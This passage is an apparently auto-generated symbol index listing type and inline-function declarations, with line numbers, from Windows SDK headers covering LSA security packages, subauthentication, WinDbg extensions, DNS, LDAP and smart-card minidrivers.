type SECPKG_EVENT_ROLE_CHANGE (line 1137) | typedef struct _SECPKG_EVENT_ROLE_CHANGE {
type SECPKG_EVENT_DOMAIN_CHANGE (line 1142) | typedef struct _SECPKG_PARAMETERS SECPKG_EVENT_DOMAIN_CHANGE;
type _SECPKG_PARAMETERS (line 1143) | struct _SECPKG_PARAMETERS
type SECPKG_EVENT_NOTIFY (line 1146) | typedef struct _SECPKG_EVENT_NOTIFY {
type LSA_IMPERSONATE_CLIENT (line 1186) | typedef LSA_IMPERSONATE_CLIENT * PLSA_IMPERSONATE_CLIENT;
type LSA_UNLOAD_PACKAGE (line 1187) | typedef LSA_UNLOAD_PACKAGE * PLSA_UNLOAD_PACKAGE;
type LSA_DUPLICATE_HANDLE (line 1188) | typedef LSA_DUPLICATE_HANDLE * PLSA_DUPLICATE_HANDLE;
type LSA_SAVE_SUPPLEMENTAL_CREDENTIALS (line 1189) | typedef LSA_SAVE_SUPPLEMENTAL_CREDENTIALS * PLSA_SAVE_SUPPLEMENTAL_CREDE...
type LSA_CREATE_THREAD (line 1190) | typedef LSA_CREATE_THREAD * PLSA_CREATE_THREAD;
type LSA_GET_CLIENT_INFO (line 1191) | typedef LSA_GET_CLIENT_INFO * PLSA_GET_CLIENT_INFO;
type LSA_REGISTER_NOTIFICATION (line 1192) | typedef LSA_REGISTER_NOTIFICATION * PLSA_REGISTER_NOTIFICATION;
type LSA_CANCEL_NOTIFICATION (line 1193) | typedef LSA_CANCEL_NOTIFICATION * PLSA_CANCEL_NOTIFICATION;
type LSA_MAP_BUFFER (line 1194) | typedef LSA_MAP_BUFFER * PLSA_MAP_BUFFER;
type LSA_CREATE_TOKEN (line 1195) | typedef LSA_CREATE_TOKEN * PLSA_CREATE_TOKEN;
type LSA_AUDIT_LOGON (line 1196) | typedef LSA_AUDIT_LOGON * PLSA_AUDIT_LOGON;
type LSA_CALL_PACKAGE (line 1197) | typedef LSA_CALL_PACKAGE * PLSA_CALL_PACKAGE;
type LSA_CALL_PACKAGEEX (line 1198) | typedef LSA_CALL_PACKAGEEX * PLSA_CALL_PACKAGEEX;
type LSA_GET_CALL_INFO (line 1199) | typedef LSA_GET_CALL_INFO * PLSA_GET_CALL_INFO;
type LSA_CREATE_SHARED_MEMORY (line 1200) | typedef LSA_CREATE_SHARED_MEMORY * PLSA_CREATE_SHARED_MEMORY;
type LSA_ALLOCATE_SHARED_MEMORY (line 1201) | typedef LSA_ALLOCATE_SHARED_MEMORY * PLSA_ALLOCATE_SHARED_MEMORY;
type LSA_FREE_SHARED_MEMORY (line 1202) | typedef LSA_FREE_SHARED_MEMORY * PLSA_FREE_SHARED_MEMORY;
type LSA_DELETE_SHARED_MEMORY (line 1203) | typedef LSA_DELETE_SHARED_MEMORY * PLSA_DELETE_SHARED_MEMORY;
type LSA_OPEN_SAM_USER (line 1204) | typedef LSA_OPEN_SAM_USER * PLSA_OPEN_SAM_USER;
type LSA_GET_USER_CREDENTIALS (line 1205) | typedef LSA_GET_USER_CREDENTIALS * PLSA_GET_USER_CREDENTIALS;
type LSA_GET_USER_AUTH_DATA (line 1206) | typedef LSA_GET_USER_AUTH_DATA * PLSA_GET_USER_AUTH_DATA;
type LSA_CLOSE_SAM_USER (line 1207) | typedef LSA_CLOSE_SAM_USER * PLSA_CLOSE_SAM_USER;
type LSA_CONVERT_AUTH_DATA_TO_TOKEN (line 1208) | typedef LSA_CONVERT_AUTH_DATA_TO_TOKEN * PLSA_CONVERT_AUTH_DATA_TO_TOKEN;
type LSA_CLIENT_CALLBACK (line 1209) | typedef LSA_CLIENT_CALLBACK * PLSA_CLIENT_CALLBACK;
type LSA_REGISTER_CALLBACK (line 1210) | typedef LSA_REGISTER_CALLBACK * PLSA_REGISTER_CALLBACK;
type LSA_UPDATE_PRIMARY_CREDENTIALS (line 1211) | typedef LSA_UPDATE_PRIMARY_CREDENTIALS * PLSA_UPDATE_PRIMARY_CREDENTIALS;
type LSA_GET_AUTH_DATA_FOR_USER (line 1212) | typedef LSA_GET_AUTH_DATA_FOR_USER * PLSA_GET_AUTH_DATA_FOR_USER;
type LSA_CRACK_SINGLE_NAME (line 1213) | typedef LSA_CRACK_SINGLE_NAME * PLSA_CRACK_SINGLE_NAME;
type LSA_AUDIT_ACCOUNT_LOGON (line 1214) | typedef LSA_AUDIT_ACCOUNT_LOGON * PLSA_AUDIT_ACCOUNT_LOGON;
type LSA_CALL_PACKAGE_PASSTHROUGH (line 1215) | typedef LSA_CALL_PACKAGE_PASSTHROUGH * PLSA_CALL_PACKAGE_PASSTHROUGH;
type LSA_PROTECT_MEMORY (line 1216) | typedef LSA_PROTECT_MEMORY * PLSA_PROTECT_MEMORY;
type LSA_OPEN_TOKEN_BY_LOGON_ID (line 1217) | typedef LSA_OPEN_TOKEN_BY_LOGON_ID * PLSA_OPEN_TOKEN_BY_LOGON_ID;
type LSA_EXPAND_AUTH_DATA_FOR_DOMAIN (line 1218) | typedef LSA_EXPAND_AUTH_DATA_FOR_DOMAIN * PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN;
type LSA_CREATE_TOKEN_EX (line 1219) | typedef LSA_CREATE_TOKEN_EX * PLSA_CREATE_TOKEN_EX;
type ENCRYPTED_CREDENTIALW (line 1231) | typedef struct _ENCRYPTED_CREDENTIALW {
type CredParsedUserNameType (line 1265) | typedef enum _CredParsedUserNameType
type SEC_WINNT_AUTH_IDENTITY32 (line 1352) | typedef struct _SEC_WINNT_AUTH_IDENTITY32 {
type SEC_WINNT_AUTH_IDENTITY_EX32 (line 1362) | typedef struct _SEC_WINNT_AUTH_IDENTITY_EX32 {
type LSA_SECPKG_FUNCTION_TABLE (line 1377) | typedef struct _LSA_SECPKG_FUNCTION_TABLE {
type LSA_LOCATE_PKG_BY_ID (line 1451) | typedef LSA_LOCATE_PKG_BY_ID * PLSA_LOCATE_PKG_BY_ID;
type SECPKG_DLL_FUNCTIONS (line 1453) | typedef struct _SECPKG_DLL_FUNCTIONS {
type NTSTATUS (line 1495) | typedef NTSTATUS
type LSA_AP_LOGON_USER_EX2 (line 1515) | typedef LSA_AP_LOGON_USER_EX2 *PLSA_AP_LOGON_USER_EX2;
type SECPKG_FUNCTION_TABLE (line 1710) | typedef struct _SECPKG_FUNCTION_TABLE {
type SECPKG_USER_FUNCTION_TABLE (line 1842) | typedef struct _SECPKG_USER_FUNCTION_TABLE {
type KSEC_CONTEXT_TYPE (line 1908) | typedef enum _KSEC_CONTEXT_TYPE {
type KSEC_LIST_ENTRY (line 1913) | typedef struct _KSEC_LIST_ENTRY {
type KSEC_CREATE_CONTEXT_LIST (line 1977) | typedef KSEC_CREATE_CONTEXT_LIST * PKSEC_CREATE_CONTEXT_LIST;
type KSEC_INSERT_LIST_ENTRY (line 1978) | typedef KSEC_INSERT_LIST_ENTRY * PKSEC_INSERT_LIST_ENTRY;
type KSEC_REFERENCE_LIST_ENTRY (line 1979) | typedef KSEC_REFERENCE_LIST_ENTRY * PKSEC_REFERENCE_LIST_ENTRY;
type KSEC_DEREFERENCE_LIST_ENTRY (line 1980) | typedef KSEC_DEREFERENCE_LIST_ENTRY * PKSEC_DEREFERENCE_LIST_ENTRY;
type KSEC_SERIALIZE_WINNT_AUTH_DATA (line 1981) | typedef KSEC_SERIALIZE_WINNT_AUTH_DATA * PKSEC_SERIALIZE_WINNT_AUTH_DATA;
type KSEC_SERIALIZE_SCHANNEL_AUTH_DATA (line 1982) | typedef KSEC_SERIALIZE_SCHANNEL_AUTH_DATA * PKSEC_SERIALIZE_SCHANNEL_AUT...
type KSEC_LOCATE_PKG_BY_ID (line 1989) | typedef KSEC_LOCATE_PKG_BY_ID * PKSEC_LOCATE_PKG_BY_ID;
type SECPKG_KERNEL_FUNCTIONS (line 1997) | typedef struct _SECPKG_KERNEL_FUNCTIONS {
type SECPKG_KERNEL_FUNCTION_TABLE (line 2099) | typedef struct _SECPKG_KERNEL_FUNCTION_TABLE {
FILE: inc/SubAuth.h
type LONG (line 25) | typedef LONG NTSTATUS, *PNTSTATUS;
type UNICODE_STRING (line 27) | typedef struct _UNICODE_STRING {
type STRING (line 33) | typedef struct _STRING {
type OLD_LARGE_INTEGER (line 42) | typedef struct _OLD_LARGE_INTEGER {
type PVOID (line 52) | typedef PVOID SAM_HANDLE, *PSAM_HANDLE;
type LOGON_HOURS (line 117) | typedef struct _LOGON_HOURS {
type SR_SECURITY_DESCRIPTOR (line 139) | typedef struct _SR_SECURITY_DESCRIPTOR {
type USER_ALL_INFORMATION (line 148) | typedef struct _USER_ALL_INFORMATION {
type CLEAR_BLOCK (line 193) | typedef struct _CLEAR_BLOCK {
type CLEAR_BLOCK (line 196) | typedef CLEAR_BLOCK * PCLEAR_BLOCK;
type CYPHER_BLOCK (line 200) | typedef struct _CYPHER_BLOCK {
type CYPHER_BLOCK (line 203) | typedef CYPHER_BLOCK * PCYPHER_BLOCK;
type LM_OWF_PASSWORD (line 204) | typedef struct _LM_OWF_PASSWORD {
type LM_OWF_PASSWORD (line 207) | typedef LM_OWF_PASSWORD * PLM_OWF_PASSWORD;
type CLEAR_BLOCK (line 208) | typedef CLEAR_BLOCK LM_CHALLENGE;
type LM_CHALLENGE (line 209) | typedef LM_CHALLENGE * PLM_CHALLENGE;
type LM_OWF_PASSWORD (line 210) | typedef LM_OWF_PASSWORD NT_OWF_PASSWORD;
type NT_OWF_PASSWORD (line 211) | typedef NT_OWF_PASSWORD * PNT_OWF_PASSWORD;
type LM_CHALLENGE (line 212) | typedef LM_CHALLENGE NT_CHALLENGE;
type NT_CHALLENGE (line 213) | typedef NT_CHALLENGE * PNT_CHALLENGE;
type USER_SESSION_KEY (line 216) | typedef struct _USER_SESSION_KEY {
type USER_SESSION_KEY (line 219) | typedef USER_SESSION_KEY * PUSER_SESSION_KEY;
type NETLOGON_LOGON_INFO_CLASS (line 221) | typedef enum _NETLOGON_LOGON_INFO_CLASS {
type NETLOGON_LOGON_IDENTITY_INFO (line 231) | typedef struct _NETLOGON_LOGON_IDENTITY_INFO {
type NETLOGON_INTERACTIVE_INFO (line 240) | typedef struct _NETLOGON_INTERACTIVE_INFO {
type NETLOGON_SERVICE_INFO (line 247) | typedef struct _NETLOGON_SERVICE_INFO {
type NETLOGON_NETWORK_INFO (line 253) | typedef struct _NETLOGON_NETWORK_INFO {
type NETLOGON_GENERIC_INFO (line 260) | typedef struct _NETLOGON_GENERIC_INFO {
type MSV1_0_VALIDATION_INFO (line 288) | typedef struct _MSV1_0_VALIDATION_INFO {
FILE: inc/WDBGEXTS.H
type CONST (line 56) | typedef CONST void *LPCVOID;
type ULONGLONG (line 60) | typedef unsigned __int64 ULONGLONG;
type ULONGLONG (line 61) | typedef ULONGLONG *PULONGLONG;
type EXTSTACKTRACE (line 247) | typedef struct _EXTSTACKTRACE {
type EXTSTACKTRACE32 (line 254) | typedef struct _EXTSTACKTRACE32 {
type EXTSTACKTRACE64 (line 261) | typedef struct _EXTSTACKTRACE64 {
type WINDBG_EXTENSION_APIS (line 299) | typedef struct _WINDBG_EXTENSION_APIS {
type WINDBG_EXTENSION_APIS32 (line 314) | typedef struct _WINDBG_EXTENSION_APIS32 {
type WINDBG_EXTENSION_APIS64 (line 329) | typedef struct _WINDBG_EXTENSION_APIS64 {
type WINDBG_OLD_EXTENSION_APIS (line 345) | typedef struct _WINDBG_OLD_EXTENSION_APIS {
type WINDBG_OLDKD_EXTENSION_APIS (line 354) | typedef struct _WINDBG_OLDKD_EXTENSION_APIS {
type EXT_API_VERSION (line 447) | typedef struct EXT_API_VERSION {
type PROCESSORINFO (line 512) | typedef struct _PROCESSORINFO {
type READCONTROLSPACE (line 517) | typedef struct _READCONTROLSPACE {
type READCONTROLSPACE32 (line 524) | typedef struct _READCONTROLSPACE32 {
type READCONTROLSPACE64 (line 531) | typedef struct _READCONTROLSPACE64 {
type IOSPACE (line 538) | typedef struct _IOSPACE {
type IOSPACE32 (line 544) | typedef struct _IOSPACE32 {
type IOSPACE64 (line 550) | typedef struct _IOSPACE64 {
type IOSPACE_EX (line 556) | typedef struct _IOSPACE_EX {
type IOSPACE_EX32 (line 565) | typedef struct _IOSPACE_EX32 {
type IOSPACE_EX64 (line 574) | typedef struct _IOSPACE_EX64 {
type BUSDATA (line 583) | typedef struct _GETSETBUSDATA {
type SEARCHMEMORY (line 592) | typedef struct _SEARCHMEMORY {
type PHYSICAL (line 600) | typedef struct _PHYSICAL {
type PHYSICAL_WITH_FLAGS (line 611) | typedef struct _PHYSICAL_WITH_FLAGS {
type READ_WRITE_MSR (line 618) | typedef struct _READ_WRITE_MSR {
type GET_SET_SYMPATH (line 623) | typedef struct _GET_SET_SYMPATH {
type GET_TEB_ADDRESS (line 629) | typedef struct _GET_TEB_ADDRESS {
type GET_PEB_ADDRESS (line 633) | typedef struct _GET_PEB_ADDRESS {
type GET_CURRENT_THREAD_ADDRESS (line 638) | typedef struct _GET_CURRENT_THREAD_ADDRESS {
type GET_CURRENT_PROCESS_ADDRESS (line 643) | typedef struct _GET_CURRENT_PROCESS_ADDRESS {
type GET_INPUT_LINE (line 649) | typedef struct _GET_INPUT_LINE {
type GET_EXPRESSION_EX (line 656) | typedef struct _GET_EXPRESSION_EX {
type TRANSLATE_VIRTUAL_TO_PHYSICAL (line 662) | typedef struct _TRANSLATE_VIRTUAL_TO_PHYSICAL {
type VIRTUAL_TO_PHYSICAL (line 667) | typedef struct _VIRTUAL_TO_PHYSICAL {
type PHYSICAL_TO_VIRTUAL (line 675) | typedef struct _PHYSICAL_TO_VIRTUAL {
type GET_CONTEXT_EX (line 681) | typedef struct _GET_CONTEXT_EX {
type POINTER_SEARCH_PHYSICAL (line 696) | typedef struct _POINTER_SEARCH_PHYSICAL {
type WDBGEXTS_THREAD_OS_INFO (line 707) | typedef struct _WDBGEXTS_THREAD_OS_INFO {
type WDBGEXTS_CLR_DATA_INTERFACE (line 732) | typedef struct _WDBGEXTS_CLR_DATA_INTERFACE {
type EXT_MATCH_PATTERN_A (line 739) | typedef struct _EXT_MATCH_PATTERN_A {
type EXT_FIND_FILE (line 747) | typedef struct _EXT_FIND_FILE {
type DEBUG_TYPED_DATA (line 775) | typedef struct _DEBUG_TYPED_DATA
type EXT_TDOP (line 790) | typedef enum _EXT_TDOP {
type EXT_TYPED_DATA (line 823) | typedef struct _EXT_TYPED_DATA {
type WDBGEXTS_QUERY_INTERFACE (line 844) | typedef struct _WDBGEXTS_QUERY_INTERFACE {
type WDBGEXTS_DISASSEMBLE_BUFFER (line 856) | typedef struct _WDBGEXTS_DISASSEMBLE_BUFFER {
type WDBGEXTS_MODULE_IN_RANGE (line 870) | typedef struct _WDBGEXTS_MODULE_IN_RANGE {
type DBGKD_MAJOR_TYPES (line 898) | typedef enum _DBGKD_MAJOR_TYPES
type DBGKD_GET_VERSION32 (line 928) | typedef struct _DBGKD_GET_VERSION32 {
type DBGKD_DEBUG_DATA_HEADER32 (line 995) | typedef struct _DBGKD_DEBUG_DATA_HEADER32 {
type KDDEBUGGER_DATA32 (line 1003) | typedef struct _KDDEBUGGER_DATA32 {
type DBGKD_GET_VERSION64 (line 1118) | typedef struct _DBGKD_GET_VERSION64 {
type DBGKD_DEBUG_DATA_HEADER64 (line 1166) | typedef struct _DBGKD_DEBUG_DATA_HEADER64 {
type KDDEBUGGER_DATA64 (line 1203) | typedef struct _KDDEBUGGER_DATA64 {
type FIELD_INFO (line 1617) | typedef struct _FIELD_INFO {
type SYM_DUMP_PARAM (line 1642) | typedef struct _SYM_DUMP_PARAM {
function VOID (line 1756) | __inline VOID
function VOID (line 1780) | __inline VOID
function VOID (line 1804) | __inline VOID
function VOID (line 1830) | __inline VOID
function VOID (line 1856) | __inline VOID
function VOID (line 1870) | __inline VOID
function VOID (line 1883) | __inline VOID
function VOID (line 1891) | __inline VOID
function VOID (line 1899) | __inline VOID
function VOID (line 1908) | __inline VOID
function VOID (line 1931) | __inline VOID
function VOID (line 1957) | __inline VOID
function VOID (line 1983) | __inline VOID
function VOID (line 2008) | __inline VOID
function VOID (line 2023) | __inline VOID
function VOID (line 2038) | __inline VOID
function VOID (line 2053) | __inline VOID
function VOID (line 2068) | __inline VOID
function VOID (line 2083) | __inline VOID
function VOID (line 2098) | __inline VOID
function VOID (line 2120) | __inline VOID
function VOID (line 2142) | __inline VOID
function VOID (line 2164) | __inline VOID
function VOID (line 2185) | __inline VOID
function VOID (line 2206) | __inline VOID
function VOID (line 2227) | __inline VOID
function VOID (line 2257) | __inline VOID
function ULONG (line 2295) | __inline
function ULONG (line 2312) | __inline
function ULONG (line 2339) | __inline
function ULONG (line 2365) | __inline
function ULONG (line 2391) | __inline
function ULONG (line 2421) | __inline
function ULONG64 (line 2464) | __inline
function ULONG (line 2520) | __inline
function ULONG (line 2556) | __inline
function ULONG (line 2592) | __inline
function VOID (line 2631) | __inline VOID
function VOID (line 2639) | __inline VOID
function VOID (line 2650) | __inline VOID
function VOID (line 2663) | __inline VOID
function VOID (line 2675) | __inline VOID
function VOID (line 2689) | __inline VOID
function ULONG (line 2708) | __inline ULONG
function BOOL (line 2729) | __inline BOOL
function BOOL (line 2753) | __inline BOOL
function BOOL (line 2770) | __inline BOOL
function BOOL (line 2778) | __inline BOOL
FILE: inc/WinBer.h
type ber_tag_t (line 51) | typedef unsigned int ber_tag_t;
type ber_int_t (line 52) | typedef int ber_int_t;
type ber_uint_t (line 53) | typedef unsigned int ber_uint_t;
type ber_len_t (line 54) | typedef unsigned int ber_len_t;
type ber_slen_t (line 55) | typedef int ber_slen_t;
FILE: inc/WinDNS.h
type QWORD (line 38) | typedef unsigned __int64 QWORD, *PQWORD;
type DNS_STATUS (line 44) | typedef __success(return == 0) LONG DNS_STATUS;
type DNS_STATUS (line 45) | typedef DNS_STATUS *PDNS_STATUS;
type DWORD (line 51) | typedef DWORD IP4_ADDRESS, *PIP4_ADDRESS;
type IP4_ARRAY (line 65) | typedef struct _IP4_ARRAY
type IP6_ADDRESS (line 89) | typedef struct
type IP6_ADDRESS (line 99) | typedef union
type DNS_HEADER (line 262) | typedef struct _DNS_HEADER
type DNS_HEADER_EXT (line 285) | typedef struct _DNS_HEADER_EXT
type DNS_WIRE_QUESTION (line 346) | typedef struct _DNS_WIRE_QUESTION
type DNS_WIRE_RECORD (line 360) | typedef struct _DNS_WIRE_RECORD
type DNS_CONFIG_TYPE (line 808) | typedef enum
type DNS_A_DATA (line 875) | typedef struct
type DNS_PTR_DATAW (line 881) | typedef struct
type DNS_PTR_DATAA (line 887) | typedef struct
type DNS_SOA_DATAW (line 893) | typedef struct
type DNS_SOA_DATAA (line 905) | typedef struct
type DNS_MINFO_DATAW (line 917) | typedef struct
type DNS_MINFO_DATAA (line 924) | typedef struct
type DNS_MX_DATAW (line 931) | typedef struct
type DNS_MX_DATAA (line 939) | typedef struct
type DNS_TXT_DATAW (line 947) | typedef struct
type DNS_TXT_DATAA (line 958) | typedef struct
type DNS_NULL_DATA (line 969) | typedef struct
type DNS_WKS_DATA (line 980) | typedef struct
type DNS_AAAA_DATA (line 988) | typedef struct
type DNS_SIG_DATAW (line 994) | typedef struct
type DNS_SIG_DATAA (line 1009) | typedef struct
type DNS_KEY_DATA (line 1024) | typedef struct
type DNS_DHCID_DATA (line 1035) | typedef struct
type DNS_NSEC_DATAW (line 1046) | typedef struct
type DNS_NSEC_DATAA (line 1055) | typedef struct
type DNS_DS_DATA (line 1064) | typedef struct
type DNS_OPT_DATA (line 1075) | typedef struct
type DNS_LOC_DATA (line 1083) | typedef struct
type DNS_NXT_DATAW (line 1095) | typedef struct
type DNS_NXT_DATAA (line 1103) | typedef struct
type DNS_SRV_DATAW (line 1111) | typedef struct
type DNS_SRV_DATAA (line 1121) | typedef struct
type DNS_NAPTR_DATAW (line 1131) | typedef struct
type DNS_NAPTR_DATAA (line 1142) | typedef struct
type DNS_ATMA_DATA (line 1155) | typedef struct
type DNS_TKEY_DATAW (line 1169) | typedef struct
type DNS_TKEY_DATAA (line 1186) | typedef struct
type DNS_TSIG_DATAW (line 1203) | typedef struct
type DNS_TSIG_DATAA (line 1220) | typedef struct
type DNS_WINS_DATA (line 1241) | typedef struct
type DNS_WINSR_DATAW (line 1251) | typedef struct
type DNS_WINSR_DATAA (line 1260) | typedef struct
type DNS_PTR_DATAW (line 1274) | typedef DNS_PTR_DATAW DNS_PTR_DATA, *PDNS_PTR_DATA;
type DNS_SOA_DATAW (line 1275) | typedef DNS_SOA_DATAW DNS_SOA_DATA, *PDNS_SOA_DATA;
type DNS_MINFO_DATAW (line 1276) | typedef DNS_MINFO_DATAW DNS_MINFO_DATA, *PDNS_MINFO_DATA;
type DNS_MX_DATAW (line 1277) | typedef DNS_MX_DATAW DNS_MX_DATA, *PDNS_MX_DATA;
type DNS_TXT_DATAW (line 1278) | typedef DNS_TXT_DATAW DNS_TXT_DATA, *PDNS_TXT_DATA;
type DNS_SIG_DATAW (line 1279) | typedef DNS_SIG_DATAW DNS_SIG_DATA, *PDNS_SIG_DATA;
type DNS_NXT_DATAW (line 1280) | typedef DNS_NXT_DATAW DNS_NXT_DATA, *PDNS_NXT_DATA;
type DNS_SRV_DATAW (line 1281) | typedef DNS_SRV_DATAW DNS_SRV_DATA, *PDNS_SRV_DATA;
type DNS_NAPTR_DATAW (line 1282) | typedef DNS_NAPTR_DATAW DNS_NAPTR_DATA, *PDNS_NAPTR_DATA;
type DNS_RRSIG_DATAW (line 1283) | typedef DNS_RRSIG_DATAW DNS_RRSIG_DATA, *PDNS_RRSIG_DATA;
type DNS_NSEC_DATAW (line 1284) | typedef DNS_NSEC_DATAW DNS_NSEC_DATA, *PDNS_NSEC_DATA;
type DNS_TKEY_DATAW (line 1285) | typedef DNS_TKEY_DATAW DNS_TKEY_DATA, *PDNS_TKEY_DATA;
type DNS_TSIG_DATAW (line 1286) | typedef DNS_TSIG_DATAW DNS_TSIG_DATA, *PDNS_TSIG_DATA;
type DNS_WINSR_DATAW (line 1287) | typedef DNS_WINSR_DATAW DNS_WINSR_DATA, *PDNS_WINSR_DATA;
type DNS_PTR_DATAA (line 1289) | typedef DNS_PTR_DATAA DNS_PTR_DATA, *PDNS_PTR_DATA;
type DNS_SOA_DATAA (line 1290) | typedef DNS_SOA_DATAA DNS_SOA_DATA, *PDNS_SOA_DATA;
type DNS_MINFO_DATAA (line 1291) | typedef DNS_MINFO_DATAA DNS_MINFO_DATA, *PDNS_MINFO_DATA;
type DNS_MX_DATAA (line 1292) | typedef DNS_MX_DATAA DNS_MX_DATA, *PDNS_MX_DATA;
type DNS_TXT_DATAA (line 1293) | typedef DNS_TXT_DATAA DNS_TXT_DATA, *PDNS_TXT_DATA;
type DNS_SIG_DATAA (line 1294) | typedef DNS_SIG_DATAA DNS_SIG_DATA, *PDNS_SIG_DATA;
type DNS_NXT_DATAA (line 1295) | typedef DNS_NXT_DATAA DNS_NXT_DATA, *PDNS_NXT_DATA;
type DNS_SRV_DATAA (line 1296) | typedef DNS_SRV_DATAA DNS_SRV_DATA, *PDNS_SRV_DATA;
type DNS_NAPTR_DATAA (line 1297) | typedef DNS_NAPTR_DATAA DNS_NAPTR_DATA, *PDNS_NAPTR_DATA;
type DNS_RRSIG_DATAA (line 1298) | typedef DNS_RRSIG_DATAA DNS_RRSIG_DATA, *PDNS_RRSIG_DATA;
type DNS_NSEC_DATAA (line 1299) | typedef DNS_NSEC_DATAA DNS_NSEC_DATA, *PDNS_NSEC_DATA;
type DNS_TKEY_DATAA (line 1300) | typedef DNS_TKEY_DATAA DNS_TKEY_DATA, *PDNS_TKEY_DATA;
type DNS_TSIG_DATAA (line 1301) | typedef DNS_TSIG_DATAA DNS_TSIG_DATA, *PDNS_TSIG_DATA;
type DNS_WINSR_DATAA (line 1302) | typedef DNS_WINSR_DATAA DNS_WINSR_DATA, *PDNS_WINSR_DATA;
type DNS_RECORD_FLAGS (line 1343) | typedef struct _DnsRecordFlags
type DNS_SECTION (line 1362) | typedef enum _DnsSection
type DNS_RECORDW (line 1421) | typedef struct _DnsRecordW
type DNS_RECORD_OPTW (line 1486) | typedef struct _DnsRecordOptW
type DNS_RECORDA (line 1514) | typedef struct _DnsRecordA
type DNS_RECORD_OPTA (line 1580) | typedef struct _DnsRecordOptA
type DNS_RECORDW (line 1610) | typedef DNS_RECORDW DNS_RECORD, *PDNS_RECORD;
type DNS_RECORD_OPTW (line 1611) | typedef DNS_RECORD_OPTW DNS_RECORD_OPT, *PDNS_RECORD_OPT;
type DNS_RECORDA (line 1613) | typedef DNS_RECORDA DNS_RECORD, *PDNS_RECORD;
type DNS_RECORD_OPTA (line 1614) | typedef DNS_RECORD_OPTA DNS_RECORD_OPT, *PDNS_RECORD_OPT;
type DNS_RRSET (line 1635) | typedef struct _DnsRRSet
type DNS_PROXY_INFORMATION_TYPE (line 1693) | typedef enum DNS_PROXY_INFORMATION_TYPE {
type DNS_PROXY_INFORMATION (line 1700) | typedef struct DNS_PROXY_INFORMATION {
type DNS_CHARSET (line 1719) | typedef enum _DNS_CHARSET
type DNS_FREE_TYPE (line 1802) | typedef enum
type DNS_NAME_FORMAT (line 2070) | typedef enum _DNS_NAME_FORMAT
type DNS_MESSAGE_BUFFER (line 2164) | typedef struct _DNS_MESSAGE_BUFFER
FILE: inc/Winldap.h
type LDAP_RETCODE (line 168) | typedef enum {
type LDAP (line 376) | typedef struct ldap {
type LDAP_TIMEVAL (line 432) | typedef struct l_timeval {
type LDAP_BERVAL (line 443) | typedef struct berval {
type LDAPMessage (line 452) | typedef struct ldapmsg {
type LDAPControlA (line 485) | typedef struct ldapcontrolA {
type LDAPControlW (line 493) | typedef struct ldapcontrolW {
type LDAPModW (line 533) | typedef struct ldapmodW {
type LDAPModA (line 542) | typedef struct ldapmodA {
type l_timeval (line 610) | struct l_timeval
type l_timeval (line 1031) | struct l_timeval
type l_timeval (line 1041) | struct l_timeval
type l_timeval (line 1083) | struct l_timeval
type l_timeval (line 1097) | struct l_timeval
type l_timeval (line 1139) | struct l_timeval
type l_timeval (line 1166) | struct l_timeval
type berval (line 1679) | struct berval
type berval (line 1690) | struct berval
type l_timeval (line 1817) | struct l_timeval
type berval (line 1871) | struct berval
type berval (line 1879) | struct berval
type BerElement (line 1998) | typedef struct berelement {
type berval (line 2166) | struct berval
type berval (line 2191) | struct berval
type berval (line 2259) | struct berval
type LDAP_VERSION_INFO (line 2319) | typedef struct ldap_version_info {
type LDAPAPIInfoA (line 2347) | typedef struct ldapapiinfoA {
type LDAPAPIInfoW (line 2358) | typedef struct ldapapiinfoW {
type LDAPAPIFeatureInfoA (line 2371) | typedef struct ldap_apifeature_infoA {
type LDAPAPIFeatureInfoW (line 2379) | typedef struct ldap_apifeature_infoW {
type LDAPSearch (line 2516) | typedef struct ldapsearch LDAPSearch, *PLDAPSearch;
type LDAPSortKeyW (line 2518) | typedef struct ldapsortkeyW {
type LDAPSortKeyA (line 2526) | typedef struct ldapsortkeyA {
type berval (line 2650) | struct berval
type berval (line 2658) | struct berval
type berval (line 2667) | struct berval
type berval (line 2674) | struct berval
type berval (line 2687) | struct berval
type berval (line 2696) | struct berval
type l_timeval (line 2795) | struct l_timeval
type LDAPVLVInfo (line 2837) | typedef struct ldapvlvinfo {
type berval (line 3048) | struct berval
type berval (line 3057) | struct berval
type berval (line 3066) | struct berval
type berval (line 3070) | struct berval
type berval (line 3076) | struct berval
type berval (line 3080) | struct berval
type berval (line 3095) | struct berval
type LDAP_REFERRAL_CALLBACK (line 3190) | typedef struct LdapReferralCallback {
FILE: inc/cardmod.h
type CARD_DATA (line 42) | typedef struct _CARD_DATA CARD_DATA, *PCARD_DATA;
type ULONG_PTR (line 44) | typedef ULONG_PTR CARD_KEY_HANDLE, *PCARD_KEY_HANDLE;
type CARD_CACHE_FILE_FORMAT (line 125) | typedef struct _CARD_CACHE_FILE_FORMAT
type CONTAINER_MAP_RECORD (line 152) | typedef struct _CONTAINER_MAP_RECORD
type CARD_DIRECTORY_ACCESS_CONDITION (line 172) | typedef enum
type CARD_FILE_ACCESS_CONDITION (line 185) | typedef enum
type CARD_CAPABILITIES (line 264) | typedef struct _CARD_CAPABILITIES
type DWORD (line 291) | typedef DWORD PIN_ID, *PPIN_ID;
type DWORD (line 292) | typedef DWORD PIN_SET, *PPIN_SET;
type SECRET_TYPE (line 322) | typedef enum
type SECRET_PURPOSE (line 330) | typedef enum
type PIN_CACHE_POLICY_TYPE (line 341) | typedef enum
type PIN_CACHE_POLICY (line 351) | typedef struct _PIN_CACHE_POLICY
type PIN_INFO (line 362) | typedef struct _PIN_INFO
type CONTAINER_INFO (line 541) | typedef struct _CONTAINER_INFO
type CARD_FILE_INFO (line 872) | typedef struct _CARD_FILE_INFO
type CARD_FREE_SPACE_INFO (line 898) | typedef struct _CARD_FREE_SPACE_INFO
type CARD_KEY_SIZES (line 924) | typedef struct _CARD_KEY_SIZES
type CARD_RSA_DECRYPT_INFO (line 963) | typedef struct _CARD_RSA_DECRYPT_INFO
type CARD_SIGNING_INFO (line 1014) | typedef struct _CARD_SIGNING_INFO
type CARD_DH_AGREEMENT_INFO (line 1070) | typedef struct _CARD_DH_AGREEMENT_INFO
type CARD_DERIVE_KEY (line 1111) | typedef struct _CARD_DERIVE_KEY
type CARD_ENCRYPTED_DATA (line 1417) | typedef struct _CARD_ENCRYPTED_DATA {
type CARD_IMPORT_KEYPAIR (line 1425) | typedef struct _CARD_IMPORT_KEYPAIR
type CARD_CHANGE_AUTHENTICATOR (line 1439) | typedef struct _CARD_CHANGE_AUTHENTICATOR
type CARD_CHANGE_AUTHENTICATOR_RESPONSE (line 1456) | typedef struct _CARD_CHANGE_AUTHENTICATOR_RESPONSE
type CARD_AUTHENTICATE (line 1465) | typedef struct _CARD_AUTHENTICATE
